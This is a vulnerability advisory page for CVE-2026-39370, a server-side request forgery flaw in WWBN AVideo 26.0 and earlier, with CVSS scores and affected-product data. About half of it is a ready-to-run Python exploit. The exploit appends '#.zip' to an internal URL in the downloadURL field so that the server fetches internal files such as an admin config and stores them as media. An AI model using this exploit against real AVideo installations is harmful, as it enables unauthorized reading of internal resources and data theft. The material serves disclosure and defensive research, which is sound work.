Security Vulnerability Report
CVE-2026-39370 (CVSS 7.1, HIGH)

Published: 2026-04-07 20:16:32
Last Modified: 2026-04-22 18:50:12

Description

WWBN AVideo is an open source video platform. In versions 26.0 and prior, objects/aVideoEncoder.json.php still allows attacker-controlled downloadURL values with common media or archive extensions such as .mp4, .mp3, .zip, .jpg, .png, .gif, and .webm to bypass SSRF validation. The server then fetches the response and stores it as media content. This allows an authenticated uploader to turn the upload-by-URL flow into a reliable SSRF response-exfiltration primitive. The vulnerability is caused by an incomplete fix for CVE-2026-27732.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
Exploitability Score
2.8
Impact Score
4.2

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE
WWBN AVideo <= 26.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def exploit_ssrf(target_url, attacker_cookie, internal_url):
    """
    Exploit CVE-2026-39370: SSRF in AVideo via downloadURL bypass.
    The vulnerable endpoint checks for specific extensions (.mp4, .zip, etc.)
    to validate the URL, allowing requests to internal networks.
    """
    # The endpoint vulnerable to SSRF
    upload_endpoint = f"{target_url}/objects/aVideoEncoder.json.php"

    # Payload: internal resource with an allowed extension appended to bypass validation
    # Example: accessing internal admin config using the .zip extension
    bypass_url = f"{internal_url}#.zip"

    payload = {
        "downloadURL": bypass_url,
        "title": "SSRF_Exploit",
    }
    headers = {
        "Cookie": f"PHPSESSID={attacker_cookie}",
        "User-Agent": "Mozilla/5.0",
    }

    try:
        response = requests.post(upload_endpoint, data=payload, headers=headers, timeout=10)
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print(f"[+] Server response: {response.text}")
            print("[+] Check the media library for the exfiltrated file content.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    # Configuration
    TARGET = "http://localhost/avideo"
    COOKIE = "valid_session_id_here"
    INTERNAL_TARGET = "http://127.0.0.1/admin/config.php"
    exploit_ssrf(TARGET, COOKIE, INTERNAL_TARGET)
```

Weakness

CWE-918 (Server-Side Request Forgery)

References

https://github.com/WWBN/AVideo/security/advisories/GHSA-cmcr-q4jf-p6q9 (Third Party Advisory)